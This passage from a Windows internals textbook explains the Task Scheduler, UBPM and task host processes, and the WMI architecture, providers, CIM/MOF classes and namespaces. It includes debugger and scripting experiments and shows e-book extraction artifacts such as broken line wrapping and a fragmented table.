task path with the one of your choice):
Click here to view code image
schtasks /query /tn
"Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticE
vents" /xml
The output shows the task’s XML descriptor, which includes the
Task’s security descriptor (used to protect the task for being
opened by unauthorized identities), the task’s author and
description, the security principal that should run it, the task
settings, and task triggers and actions:
Click here to view code image
<?xml version="1.0" encoding="UTF-16"?>
<Task
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task
">
<RegistrationInfo>
<Version>1.0</Version>
<SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)
(A;;FR;;;AU)</SecurityDescriptor>
<Author>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-600)
</Author>
<Description>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-
603)</Description>
<URI>\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagno
sticEvents</URI>
</RegistrationInfo>
<Principals>
<Principal id="LocalAdmin">
<GroupId>S-1-5-32-544</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<AllowHardTerminate>false</AllowHardTerminate>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries
>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<Enabled>false</Enabled>
<ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
<Hidden>true</Hidden>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfIdle>true</RunOnlyIfIdle>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>true</RestartOnIdle>
</IdleSettings>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine
>
</Settings>
<Triggers>
<EventTrigger>
<Subscription><QueryList><Query Id="0"
Path="System"><Select Path="System">*
[System[Provider[@Name=’Microsoft-Windows-WER-
SystemErrorReporting’] and (EventID=1000 or EventID=1001 or
EventID=1006)]]</Select></Query></QueryList&g
t;</Subscription>
</EventTrigger>
. . . [cut for space reasons] . . .
</Triggers>
<Actions Context="LocalAdmin">
<ComHandler>
<ClassId>{8168E74A-B39F-46D8-ADCD-7BED477B80A3}
</ClassId>
<Data><![CDATA[Event]]></Data>
</ComHandler>
</Actions>
</Task>
In the case of the ProcessMemoryDiagnosticEvents task, there
are multiple ETW triggers (which allow the task to be executed
only when certain diagnostics events are generated. Indeed, the
trigger descriptors include the ETW query specified in XPath
format). The only registered action is a ComHandler, which
includes just the CLSID (class ID) of the COM object representing
the task. Open the Registry Editor and navigate to the
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID key.
Select Find... from the Edit menu and copy and paste the CLSID
located after the ClassID XML tag of the task descriptor (with or
without the curly brackets). You should be able to find the DLL
that implements the ITaskHandler interface representing the task,
which will be hosted by the Task Host client application
(Taskhostw.exe, described later in the “Task host client” section):
If you navigate in the HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks registry key, you
should also be able to find the GUID of the task descriptor stored
in the Task store cache. To find it, you should search using the
task’s URI. Indeed, the task’s GUID is not stored in the XML
configuration file. The data belonging to the task descriptor in the
registry is identical to the one stored in the XML configuration file
located in the store’s shadow copy
(%systemroot%\System32\Tasks\Microsoft\
Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents).
Only the binary format in which it is stored changes.
Enabled tasks should be registered with UBPM. The Task Scheduler calls
the RegisterTask function of the Ubpm Proxy, which first connects to the
Credential store, for retrieving the credential used to start the task, and then
processes the list of all actions and triggers (stored in an internal list),
converting them in a format that UBPM can understand. Finally, it calls the
UbpmTriggerConsumerRegister API exported from UBPM.dll. The task is
ready to be executed when the right conditions are verified.
Unified Background Process Manager (UBPM)
Traditionally, UBPM was mainly responsible in managing tasks’ life cycles
and states (start, stop, enable/disable, and so on) and to provide notification
and triggers support. Windows 8.1 introduced the Broker Infrastructure and
moved all the triggers and notifications management to different brokers that
can be used by both Modern and standard Win32 applications. Thus, in
Windows 10, UBPM acts as a proxy for standard Win32 Tasks’ triggers and
translates the trigger consumers request to the correct broker. UBPM is still
responsible for providing COM APIs available to applications for the
following:
■ Registering and unregistering a trigger consumer, as well as opening
and closing a handle to one
■ Generating a notification or a trigger
■ Sending a command to a trigger provider
Similar to the Task Scheduler’s architecture, UBPM is composed of
various internal components: Task Host server and client, COM-based Task
Host library, and Event Manager.
Task host server
When one of the System brokers raises an event registered by a UBPM
trigger consumer (by publishing a WNF state change), the
UbpmTriggerArrived callback function is executed. UBPM searches the
internal list of a registered task’s triggers (based on the WNF state name) and,
when it finds the correct one, processes the task’s actions. At the time of this
writing, only the Launch Executable action is supported. This action supports
both hosted and nonhosted executables. Nonhosted executables are regular
Win32 executables that do not directly interact with UBPM; hosted
executables are COM classes that directly interact with UBPM and need to be
hosted by a task host client process. After a host-based executable
(taskhostw.exe) is launched, it can host different tasks, depending on its
associated token. (Host-based executables are very similar to shared Svchost
services.)
Like SCM, UBPM supports different types of logon security tokens for
task’s host processes. The UbpmTokenGetTokenForTask function is able to
create a new token based on the account information stored in the task
descriptor. The security token generated by UBPM for a task can have one of
the following owners: a registered user account, Virtual Service account,
Network Service account, or Local Service account. Unlike SCM, UBPM
fully supports Interactive tokens. UBPM uses services exposed by the User
Manager (Usermgr.dll) to enumerate the currently active interactive sessions.
For each session, it compares the User SID specified in the task’s descriptor
with the owner of the interactive session. If the two match, UBPM duplicates
the token attached to the interactive session and uses it to log on the new
executable. As a result, interactive tasks can run only with a standard user
account. (Noninteractive tasks can run with all the account types listed
previously.)
After the token has been generated, UBPM starts the task’s host process.
In case the task is a hosted COM task, the UbpmFindHost function searches
inside an internal list of Taskhostw.exe (task host client) process instances. If
it finds a process that runs with the same security context of the new task, it
simply sends a Start Task command (which includes the COM task’s name
and CLSID) through the task host local RPC connection and waits for the
first response. The task host client process and UBPM are connected through
a static RPC channel (named ubpmtaskhostchannel) and use a connection
protocol similar to the one implemented in the SCM.
If a compatible client process instance has not been found, or if the task’s
host process is a regular non-COM executable, UBPM builds a new
environment block, parses the command line, and creates a new process in a
suspended state using the CreateProcessAsUser API. UBPM runs each task’s
host process in a Job object, which allows it to quickly set the state of
multiple tasks and fine-tune the resources allocated for background tasks.
UBPM searches inside an internal list for Job objects containing host
processes belonging to the same session ID and the same type of tasks
(regular, critical, COM-based, or non-hosted). If it finds a compatible Job, it
simply assigns the new process to the Job (by using the
AssignProcessToJobObject API). Otherwise, it creates a new one and adds it
to its internal list.
After the Job object has been created, the task is finally ready to be started:
the initial process’s thread is resumed. For COM-hosted tasks, UBPM waits
for the initial contact from the task host client (performed when the client
wants to open a RPC communication channel with UBPM, similar to the way
in which Service control applications open a channel to the SCM) and sends
the Start Task command. UBPM finally registers a wait callback on the
task’s host process, which allow it to detect when a task host’s process
terminates unexpectedly.
Task Host client
The Task Host client process receives commands from UBPM (Task Host
Server) living in the Task Scheduler service. At initialization time, it opens
the local RPC interface that was created by UBPM during its initialization
and loops forever, waiting for commands to come through the channel. Four
commands are currently supported, which are sent over the
TaskHostSendResponseReceiveCommand RPC API:
■ Stopping the host
■ Starting a task
■ Stopping a task
■ Terminating a task
All task-based commands are internally implemented by a generic COM
task library, and they essentially result in the creation and destruction of
COM components. In particular, hosted tasks are COM objects that inherit
from the ITaskHandler interface. The latter exposes only four required
methods, which correspond to the different task’s state transitions: Start,
Stop, Pause, and Resume. When UBPM sends the command to start a task to
its client host process, the latter (Taskhostw.exe) creates a new thread for the
task. The new task worker thread uses the CoCreateInstance function to
create an instance of the ITaskHandler COM object representing the task and
calls its Start method. UBPM knows exactly which CLSID (class unique ID)
identifies a particular task: The task’s CLSID is stored by the Task store in
the task’s configuration and is specified at task registration time.
Additionally, hosted tasks use the functions exposed by the
ITaskHandlerStatus COM interface to notify UBPM of their current
execution state. The interface uses RPCs to call UbpmReportTaskStatus and
report the new state back to UBPM.
EXPERIMENT: Witnessing a COM-hosted task
In this experiment, you witness how the task host client process
loads the COM server DLL that implements the task. For this
experiment, you need the Debugging tools installed on your
system. (You can find the Debugging tools as part of the Windows
SDK, which is available at the https://developer.microsoft.com/en-
us/windows/downloads/windows-10-sdk/.) You will enable the task
start’s debugger breakpoint by following these steps:
1.
You need to set up Windbg as the default post-mortem
debugger. (You can skip this step if you have connected a
kernel debugger to the target system.) To do that, open an
administrative command prompt and type the following
commands:
Click here to view code image
cd "C:\Program Files (x86)\Windows
Kits\10\Debuggers\x64"
windbg.exe /I
Note that C:\Program Files (x86)\Windows
Kits\10\Debuggers\x64 is the path of the Debugging tools,
which can change depending on the debugger’s version and
the setup program.
2.
Windbg should run and show the following message,
confirming the success of the operation:
3.
After you click on the OK button, WinDbg should close
automatically.
4.
Open the Task Scheduler applet (by typing taskschd.msc in
the command prompt).
5.
Note that unless you have a kernel debugger attached, you
can’t enable the initial task’s breakpoint on noninteractive
tasks; otherwise, you won’t be able to interact with the
debugger window, which will be spawned in another
noninteractive session.
6.
Looking at the various tasks (refer to the previous
experiment, “Explore a task’s XML descriptor” for further
details), you should find an interactive COM task (named
CacheTask) under the \Microsoft\Windows\Wininet path.
Remember that the task’s Actions page should show
Custom Handler; otherwise the task is not COM task.
7.
Open the Registry Editor (by typing regedit in the
command prompt window) and navigate to the following
registry key: HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule.
8.
Right-click the Schedule key and create a new registry
value by selecting Multi-String Value from the New menu.
9.
Name the new registry value as
EnableDebuggerBreakForTaskStart. To enable the initial
task breakpoint, you should insert the full path of the task.
In this case, the full path is
\Microsoft\Windows\Wininet\CacheTask. In the previous
experiment, the task path has been referred as the task’s
URI.
10.
Close the Registry Editor and switch back to the Task
Scheduler.
11.
Right-click the CacheTask task and select Run.
12.
If you have configured everything correctly, a new WinDbg
window should appear.
13.
Configure the symbols used by the debugger by selecting
the Symbol File Path item from the File menu and by
inserting a valid path to the Windows symbol server (see
https://docs.microsoft.com/en-us/windows-
hardware/drivers/debugger/microsoft-public-symbols for
more details).
14.
You should be able to peek at the call stack of the
Taskhostw.exe process just before it was interrupted using
the k command:
Click here to view code image
0:000> k
# Child-SP RetAddr Call Site
00 000000a7`01a7f610 00007ff6`0b0337a8
taskhostw!ComTaskMgrBase::
[ComTaskMgr]::StartComTask+0x2c4
01 000000a7`01a7f960 00007ff6`0b033621
taskhostw!StartComTask+0x58
02 000000a7`01a7f9d0 00007ff6`0b033191
taskhostw!UbpmTaskHostWaitForCommands+0x2d1
3 000000a7`01a7fb00 00007ff6`0b035659
taskhostw!wWinMain+0xc1
04 000000a7`01a7fb60 00007ffa`39487bd4
taskhostw!__wmainCRTStartup+0x1c9
05 000000a7`01a7fc20 00007ffa`39aeced1
KERNEL32!BaseThreadInitThunk+0x14
06 000000a7`01a7fc50 00000000`00000000
ntdll!RtlUserThreadStart+0x21
15.
The stack shows that the task host client has just been
spawned by UBPM and has received the Start command
requesting to start a task.
16.
In the Windbg console, insert the ~. command and press
Enter. Note the current executing thread ID.
17.
You should now put a breakpoint on the CoCreateInstance
COM API and resume the execution, using the following
commands:
Click here to view code image
bp combase!CoCreateInstance
g
18.
After the debugger breaks, again insert the ~. command in
the Windbg console, press Enter, and note that the thread ID
has completely changed.
19.
This demonstrates that the task host client has created a new
thread for executing the task entry point. The documented
CoCreateInstance function is used for creating a single
COM object of the class associated with a particular
CLSID, specified as a parameter. Two GUIDs are
interesting for this experiment: the GUID of the COM class
that represents the Task and the interface ID of the interface
implemented by the COM object.
20.
In 64-bit systems, the calling convention defines that the
first four function parameters are passed through registers,
so it is easy to extract those GUIDs:
Click here to view code image
0:004> dt combase!CLSID @rcx
{0358b920-0ac7-461f-98f4-58e32cd89148}
+0x000 Data1 : 0x358b920
+0x004 Data2 : 0xac7
+0x006 Data3 : 0x461f
+0x008 Data4 : [8] "???"
0:004> dt combase!IID @r9
{839d7762-5121-4009-9234-4f0d19394f04}
+0x000 Data1 : 0x839d7762
+0x004 Data2 : 0x5121
+0x006 Data3 : 0x4009
+0x008 Data4 : [8] "???"
As you can see from the preceding output, the COM server
CLSID is {0358b920-0ac7-461f-98f4-58e32cd89148}. You can
verify that it corresponds to the GUID of the only COM action
located in the XML descriptor of the “CacheTask” task (see the
previous experiment for details). The requested interface ID is
“{839d7762-5121-4009-9234-4f0d19394f04}”, which correspond
to the GUID of the COM task handler action interface
(ITaskHandler).
Task Scheduler COM interfaces
As we have discussed in the previous section, a COM task should adhere to a
well-defined interface, which is used by UBPM to manage the state transition
of the task. While UBPM decides when to start the task and manages all of its
state, all the other interfaces used to register, remove, or just manually start
and stop a task are implemented by the Task Scheduler in its client-side DLL
(Taskschd.dll).
ITaskService is the central interface by which clients can connect to the
Task Scheduler and perform multiple operations, like enumerate registered
tasks; get an instance of the Task store (represented by the ITaskFolder COM
interface); and enable, disable, delete, or register a task and all of its
associated triggers and actions (by using the ITaskDefinition COM interface).
When a client application invokes for the first time a Task Scheduler APIs
through COM, the system loads the Task Scheduler client-side DLL
(Taskschd.dll) into the client process’s address space (as dictated by the
COM contract: Task Scheduler COM objects live in an in-proc COM server).
The COM APIs are implemented by routing requests through RPC calls into
the Task Scheduler service, which processes each request and forwards it to
UBPM if needed. The Task Scheduler COM architecture allows users to
interact with it via scripting languages like PowerShell (through the
ScheduledTasks cmdlet) or VBScript.
Windows Management
Instrumentation
Windows Management Instrumentation (WMI) is an implementation of Web-
Based Enterprise Management (WBEM), a standard that the Distributed
Management Task Force (DMTF—an industry consortium) defines. The
WBEM standard encompasses the design of an extensible enterprise data-
collection and data-management facility that has the flexibility and
extensibility required to manage local and remote systems that comprise
arbitrary components.
WMI architecture
WMI consists of four main components, as shown in Figure 10-27:
management applications, WMI infrastructure, providers, and managed
objects. Management applications are Windows applications that access and
display or process data about managed objects. A simple example of a
management application is a performance tool replacement that relies on
WMI rather than the Performance API to obtain performance information. A
more complex example is an enterprise-management tool that lets
administrators perform automated inventories of the software and hardware
configuration of every computer in their enterprise.
Figure 10-27 WMI architecture.
Developers typically must target management applications to collect data
from and manage specific objects. An object might represent one component,
such as a network adapter device, or a collection of components, such as a
computer. (The computer object might contain the network adapter object.)
Providers need to define and export the representation of the objects that
management applications are interested in. For example, the vendor of a
network adapter might want to add adapter-specific properties to the network
adapter WMI support that Windows includes, querying and setting the
adapter’s state and behavior as the management applications direct. In some
cases (for example, for device drivers), Microsoft supplies a provider that has
its own API to help developers leverage the provider’s implementation for
their own managed objects with minimal coding effort.
The WMI infrastructure, the heart of which is the Common Information
Model (CIM) Object Manager (CIMOM), is the glue that binds management
applications and providers. (CIM is described later in this chapter.) The
infrastructure also serves as the object-class store and, in many cases, as the
storage manager for persistent object properties. WMI implements the store,
or repository, as an on-disk database named the CIMOM Object Repository.
As part of its infrastructure, WMI supports several APIs through which
management applications access object data and providers supply data and
class definitions.
Windows programs and scripts (such as Windows PowerShell) use the
WMI COM API, the primary management API, to directly interact with
WMI. Other APIs layer on top of the COM API and include an Open
Database Connectivity (ODBC) adapter for the Microsoft Access database
application. A database developer uses the WMI ODBC adapter to embed
references to object data in the developer’s database. Then the developer can
easily generate reports with database queries that contain WMI-based data.
WMI ActiveX controls support another layered API. Web developers use the
ActiveX controls to construct web-based interfaces to WMI data. Another
management API is the WMI scripting API, for use in script-based
applications (like Visual Basic Scripting Edition). WMI scripting support
exists for all Microsoft programming language technologies.
Because WMI COM interfaces are for management applications, they
constitute the primary API for providers. However, unlike management
applications, which are COM clients, providers are COM or Distributed
COM (DCOM) servers (that is, the providers implement COM objects that
WMI interacts with). Possible embodiments of a WMI provider include
DLLs that load into a WMI’s manager process or stand-alone Windows
applications or Windows services. Microsoft includes a number of built-in
providers that present data from well-known sources, such as the
Performance API, the registry, the Event Manager, Active Directory, SNMP,
and modern device drivers. The WMI SDK lets developers develop third-
party WMI providers.
WMI providers
At the core of WBEM is the DMTF-designed CIM specification. The CIM
specifies how management systems represent, from a systems management
perspective, anything from a computer to an application or device on a
computer. Provider developers use the CIM to represent the components that
make up the parts of an application for which the developers want to enable
management. Developers use the Managed Object Format (MOF) language
to implement a CIM representation.
In addition to defining classes that represent objects, a provider must
interface WMI to the objects. WMI classifies providers according to the
interface features the providers supply. Table 10-14 lists WMI provider
classifications. Note that a provider can implement one or more features;
therefore, a provider can be, for example, both a class and an event provider.
To clarify the feature definitions in Table 10-14, let’s look at a provider that
implements several of those features. The Event Log provider supports
several objects, including an Event Log Computer, an Event Log Record, and
an Event Log File. The Event Log is an Instance provider because it can
define multiple instances for several of its classes. One class for which the
Event Log provider defines multiple instances is the Event Log File class
(Win32_NTEventlogFile); the Event Log provider defines an instance of this
class for each of the system’s event logs (that is, System Event Log,
Application Event Log, and Security Event Log).
Table 10-14 Provider classifications
Cla
ssifi
cati
on
Description
Clas
s
Can supply, modify, delete, and enumerate a provider-specific
class. It can also support query processing. Active Directory is a
rare example of a service that is a class provider.
Inst
Can supply, modify, delete, and enumerate instances of system
anc
e
and provider-specific classes. An instance represents a managed
object. It can also support query processing.
Pro
pert
y
Can supply and modify individual object property values.
Met
hod
Supplies methods for a provider-specific class.
Eve
nt
Generates event notifications.
Eve
nt
con
sum
er
Maps a physical consumer to a logical consumer to support event
notification.
The Event Log provider defines the instance data and lets management
applications enumerate the records. To let management applications use
WMI to back up and restore the Event Log files, the Event Log provider
implements backup and restore methods for Event Log File objects. Doing so
makes the Event Log provider a Method provider. Finally, a management
application can register to receive notification whenever a new record writes
to one of the Event Logs. Thus, the Event Log provider serves as an Event
provider when it uses WMI event notification to tell WMI that Event Log
records have arrived.
The Common Information Model and the Managed
Object Format Language
The CIM follows in the steps of object-oriented languages such as C++ and
C#, in which a modeler designs representations as classes. Working with
classes lets developers use the powerful modeling techniques of inheritance
and composition. Subclasses can inherit the attributes of a parent class, and
they can add their own characteristics and override the characteristics they
inherit from the parent class. A class that inherits properties from another
class derives from that class. Classes also compose: a developer can build a
class that includes other classes. CIM classes consist of properties and
methods. Properties describe the configuration and state of a WMI-managed
resource, and methods are executable functions that perform actions on the
WMI-managed resource.
The DMTF provides multiple classes as part of the WBEM standard.
These classes are CIM’s basic language and represent objects that apply to all
areas of management. The classes are part of the CIM core model. An
example of a core class is CIM_ManagedSystemElement. This class contains
a few basic properties that identify physical components such as hardware
devices and logical components such as processes and files. The properties
include a caption, description, installation date, and status. Thus, the
CIM_LogicalElement and CIM_PhysicalElement classes inherit the attributes
of the CIM_ManagedSystemElement class. These two classes are also part of
the CIM core model. The WBEM standard calls these classes abstract classes
because they exist solely as classes that other classes inherit (that is, no
object instances of an abstract class exist). You can therefore think of
abstract classes as templates that define properties for use in other classes.
A second category of classes represents objects that are specific to
management areas but independent of a particular implementation. These
classes constitute the common model and are considered an extension of the
core model. An example of a common-model class is the CIM_FileSystem
class, which inherits the attributes of CIM_LogicalElement. Because
virtually every operating system—including Windows, Linux, and other
varieties of UNIX—rely on file system–based structured storage, the
CIM_FileSystem class is an appropriate constituent of the common model.
The final class category, the extended model, comprises technology-
specific additions to the common model. Windows defines a large set of
these classes to represent objects specific to the Windows environment.
Because all operating systems store data in files, the CIM model includes the
CIM_LogicalFile class. The CIM_DataFile class inherits the
CIM_LogicalFile class, and Windows adds the Win32_PageFile and
Win32_ShortcutFile file classes for those Windows file types.
Windows includes different WMI management applications that allow an
administrator to interact with WMI namespaces and classes. The WMI
command-line utility (WMIC.exe) and Windows PowerShell are able to
connect to WMI, execute queries, and invoke WMI class object methods.
Figure 10-28 shows a PowerShell window extracting information of the
Win32_NTEventlogFile class, part of the Event Log provider. This class
makes extensive use of inheritance and derives from CIM_DataFile. Event
Log files are data files that have additional Event Log–specific attributes
such as a log file name (LogfileName) and a count of the number of records
that the file contains (NumberOfRecords). The Win32_NTEventlogFile is
based on several levels of inheritance, in which CIM_DataFile derives from
CIM_LogicalFile, which derives from CIM_LogicalElement, and
CIM_LogicalElement derives from CIM_ManagedSystemElement.
Figure 10-28 Windows PowerShell extracting information from the
Win32_NTEventlogFile class.
As stated earlier, WMI provider developers write their classes in the MOF
language. The following output shows the definition of the Event Log
provider’s Win32_NTEventlogFile, which has been queried in Figure 10-28:
Click here to view code image
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"):
ToInstance, SupportsUpdate,
Locale(1033): ToInstance, UUID("{8502C57B-5FBB-11D2-AAC1-
006008C78BC7}"): ToInstance]
class Win32_NTEventlogFile : CIM_DataFile
{
[Fixed: ToSubClass, read: ToSubClass] string LogfileName;
[read: ToSubClass, write: ToSubClass] uint32 MaxFileSize;
[read: ToSubClass] uint32 NumberOfRecords;
[read: ToSubClass, volatile: ToSubClass, ValueMap{"0", "1..365",
"4294967295"}:
ToSubClass] string OverWritePolicy;
[read: ToSubClass, write: ToSubClass, Range("0-365 | 4294967295"):
ToSubClass]
uint32 OverwriteOutDated;
[read: ToSubClass] string Sources[];
[ValueMap{"0", "8", "21", ".."}: ToSubClass, implemented,
Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 ClearEventlog([in] string ArchiveFileName);
[ValueMap{"0", "8", "21", "183", ".."}: ToSubClass, implemented,
Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 BackupEventlog([in] string ArchiveFileName);
};
One term worth reviewing is dynamic, which is a descriptive designator
for the Win32_NTEventlogFile class that the MOF file in the preceding
output shows. Dynamic means that the WMI infrastructure asks the WMI
provider for the values of properties associated with an object of that class
whenever a management application queries the object’s properties. A static
class is one in the WMI repository; the WMI infrastructure refers to the
repository to obtain the values instead of asking a provider for the values.
Because updating the repository is a relatively expensive operation, dynamic
providers are more efficient for objects that have properties that change
frequently.
EXPERIMENT: Viewing the MOF definitions of WMI
classes
You can view the MOF definition for any WMI class by using the
Windows Management Instrumentation Tester tool (WbemTest)
that comes with Windows. In this experiment, we look at the MOF
definition for the Win32_NTEventLogFile class:
1.
Type Wbemtest in the Cortana search box and press Enter.
The Windows Management Instrumentation Tester should
open.
2.
Click the Connect button, change the Namespace to
root\cimv2, and connect. The tool should enable all the
command buttons, as shown in the following figure:
3.
Click the Enum Classes button, select the Recursive option
button, and then click OK.
4.
Find Win32_NTEventLogFile in the list of classes, and then
double-click it to see its class properties.
5.
Click the Show MOF button to open a window that
displays the MOF text.
After constructing classes in MOF, WMI developers can supply the class
definitions to WMI in several ways. WDM driver developers compile a MOF
file into a binary MOF (BMF) file—a more compact binary representation
than an MOF file—and can choose to dynamically give the BMF files to the
WDM infrastructure or to statically include it in their binary. Another way is
for the provider to compile the MOF and use WMI COM APIs to give the
definitions to the WMI infrastructure. Finally, a provider can use the MOF
Compiler (Mofcomp.exe) tool to give the WMI infrastructure a classes-
compiled representation directly.
Note
Previous editions of Windows (until Windows 7) provided a graphical
tool, called WMI CIM Studio, shipped with the WMI Administrative
Tool. The tool was able to graphically show WMI namespaces, classes,
properties, and methods. Nowadays, the tool is not supported or available
for download because it was superseded by the WMI capacities of
Windows PowerShell. PowerShell is a scripting language that does not
run with a GUI. Some third-party tools present a similar interface of CIM
Studio. One of them is WMI Explorer, which is downloadable from
https://github.com/vinaypamnani/wmie2/releases.
The Common Information Model (CIM) repository is stored in the
%SystemRoot%\System32\wbem\Repository path and includes the
following:
■ Index.btr Binary-tree (btree) index file
■ MappingX.map Transaction control files (X is a number starting
from 1)
■ Objects.data CIM repository where managed resource definitions are
stored
The WMI namespace
Classes define objects, which are provided by a WMI provider. Objects are
class instances on a system. WMI uses a namespace that contains several
subnamespaces that WMI arranges hierarchically to organize objects. A
management application must connect to a namespace before the application
can access objects within the namespace.
WMI names the namespace root directory ROOT. All WMI installations
have four predefined namespaces that reside beneath root: CIMV2, Default,
Security, and WMI. Some of these namespaces have other namespaces
within them. For example, CIMV2 includes the Applications and ms_409
namespaces as subnamespaces. Providers sometimes define their own
namespaces; you can see the WMI namespace (which the Windows device
driver WMI provider defines) beneath ROOT in Windows.
Unlike a file system namespace, which comprises a hierarchy of
directories and files, a WMI namespace is only one level deep. Instead of
using names as a file system does, WMI uses object properties that it defines
as keys to identify the objects. Management applications specify class names
with key names to locate specific objects within a namespace. Thus, each
instance of a class must be uniquely identifiable by its key values. For
example, the Event Log provider uses the Win32_NTLogEvent class to
represent records in an Event Log. This class has two keys: Logfile, a string;
and RecordNumber, an unsigned integer. A management application that
queries WMI for instances of Event Log records obtains them from the
provider key pairs that identify records. The application refers to a record
using the syntax that you see in this sample object path name:
Click here to view code image
\\ANDREA-LAPTOP\root\CIMV2:Win32_NTLogEvent.Logfile="Application",
RecordNumber="1"
The first component in the name (\\ANDREA-LAPTOP) identifies the
computer on which the object is located, and the second component
(\root\CIMV2) is the namespace in which the object resides. The class name
follows the colon, and key names and their associated values follow the
period. A comma separates the key values.
WMI provides interfaces that let applications enumerate all the objects in a
particular class or to make queries that return instances of a class that match a
query criterion.
Class association
Many object types are related to one another in some way. For example, a
computer object has a processor, software, an operating system, active
processes, and so on. WMI lets providers construct an association class to
represent a logical connection between two different classes. Association
classes associate one class with another, so the classes have only two
properties: a class name and the Ref modifier. The following output shows an
association in which the Event Log provider’s MOF file associates the
Win32_NTLogEvent class with the Win32_ComputerSystem class. Given an
object, a management application can query associated objects. In this way, a
provider defines a hierarchy of objects.
Click here to view code image
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"):
ToInstance, EnumPrivileges{"SeSe
curityPrivilege"}: ToSubClass, Privileges{"SeSecurityPrivilege"}:
ToSubClass, Locale(1033):
ToInstance, UUID("{8502C57F-5FBB-11D2-AAC1-006008C78BC7}"):
ToInstance, Association:
DisableOverride ToInstance ToSubClass]
class Win32_NTLogEventComputer
{
[key, read: ToSubClass] Win32_ComputerSystem ref Computer;
[key, read: ToSubClass] Win32_NTLogEvent ref Record;
};
Figure 10-29 shows a PowerShell window displaying the first
Win32_NTLogEventComputer class instance located in the CIMV2
namespace. From the aggregated class instance, a user can query the
associated Win32_ComputerSystem object instance WIN-46E4EFTBP6Q,
which generated the event with record number 1031 in the Application log
file.
Figure 10-29 The Win32_NTLogEventComputer association class.
EXPERIMENT: Using WMI scripts to manage
systems
A powerful aspect of WMI is its support for scripting languages.
Microsoft has generated hundreds of scripts that perform common
administrative tasks for managing user accounts, files, the registry,
processes, and hardware devices. The Microsoft TechNet Scripting
Center website serves as the central location for Microsoft scripts.
Using a script from the scripting center is as easy as copying its text
from your Internet browser, storing it in a file with a .vbs extension,
and running it with the command cscript script.vbs, where
script is the name you gave the script. Cscript is the command-
line interface to Windows Script Host (WSH).
Here’s a sample TechNet script that registers to receive events
when Win32_Process object instances are created, which occur
whenever a process starts and prints a line with the name of the
process that the object represents:
Click here to view code image
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer &
"\root\cimv2")
Set colMonitoredProcesses = objWMIService. _
ExecNotificationQuery("SELECT * FROM
__InstanceCreationEvent " _
& " WITHIN 1 WHERE TargetInstance ISA
'Win32_Process'")
i = 0
Do While i = 0
Set objLatestProcess = colMonitoredProcesses.NextEvent
Wscript.Echo objLatestProcess.TargetInstance.Name
Loop
The line that invokes ExecNotificationQuery does so with a
parameter that includes a select statement, which highlights
WMI’s support for a read-only subset of the ANSI standard
Structured Query Language (SQL), known as WQL, to provide a
flexible way for WMI consumers to specify the information they
want to extract from WMI providers. Running the sample script
with Cscript and then starting Notepad results in the following
output:
Click here to view code image
C:\>cscript monproc.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
NOTEPAD.EXE
PowerShell supports the same functionality through the
Register-WmiEvent and Get-Event commands:
Click here to view code image
PS C:\> Register-WmiEvent -Query “SELECT * FROM
__InstanceCreationEvent WITHIN 1 WHERE
TargetInstance ISA 'Win32_Process'” -SourceIdentifier
“TestWmiRegistration”
PS C:\> (Get-Event)
[0].SourceEventArgs.NewEvent.TargetInstance | Select-Object
-Property
ProcessId, ExecutablePath
ProcessId ExecutablePath
--------- --------------
76016 C:\WINDOWS\system32\notepad.exe
PS C:\> Unregister-Event -SourceIdentifier
"TestWmiRegistration"
WMI implementation
The WMI service runs in a shared Svchost process that executes in the local
system account. It loads providers into the WmiPrvSE.exe provider-hosting
process, which launches as a child of the DCOM Launcher (RPC service)
process. WMI executes Wmiprvse in the local system, local service, or
network service account, depending on the value of the HostingModel
property of the WMI Win32Provider object instance that represents the
provider implementation. A Wmiprvse process exits after the provider is
removed from the cache, one minute following the last provider request it
receives.
EXPERIMENT: Viewing Wmiprvse creation
You can see WmiPrvSE being created by running Process Explorer
and executing Wmic. A WmiPrvSE process will appear beneath the
Svchost process that hosts the DCOM Launcher service. If Process
Explorer job highlighting is enabled, it will appear with the job
highlight color because, to prevent a runaway provider from
consuming all virtual memory resources on a system, Wmiprvse
executes in a job object that limits the number of child processes it
can create and the amount of virtual memory each process and all
the processes of the job can allocate. (See Chapter 5 for more
information on job objects.)
Most WMI components reside by default in %SystemRoot%\System32
and %SystemRoot%\System32\Wbem, including Windows MOF files, built-
in provider DLLs, and management application WMI DLLs. Look in the
%SystemRoot%\System32\Wbem directory, and you’ll find Ntevt.mof, the
Event Log provider MOF file. You’ll also find Ntevt.dll, the Event Log
provider’s DLL, which the WMI service uses.
Providers are generally implemented as dynamic link libraries (DLLs)
exposing COM servers that implement a specified set of interfaces
(IWbemServices is the central one. Generally, a single provider is
implemented as a single COM server). WMI includes many built-in
providers for the Windows family of operating systems. The built-in
providers, also known as standard providers, supply data and management
functions from well-known operating system sources such as the Win32
subsystem, event logs, performance counters, and registry. Table 10-15 lists
several of the standard WMI providers included with Windows.
Table 10-15 Standard WMI providers included with Windows
Provi
der
B
i
n
a
r
y
Na
me
sp
ac
e
Description
Activ
e
Direc
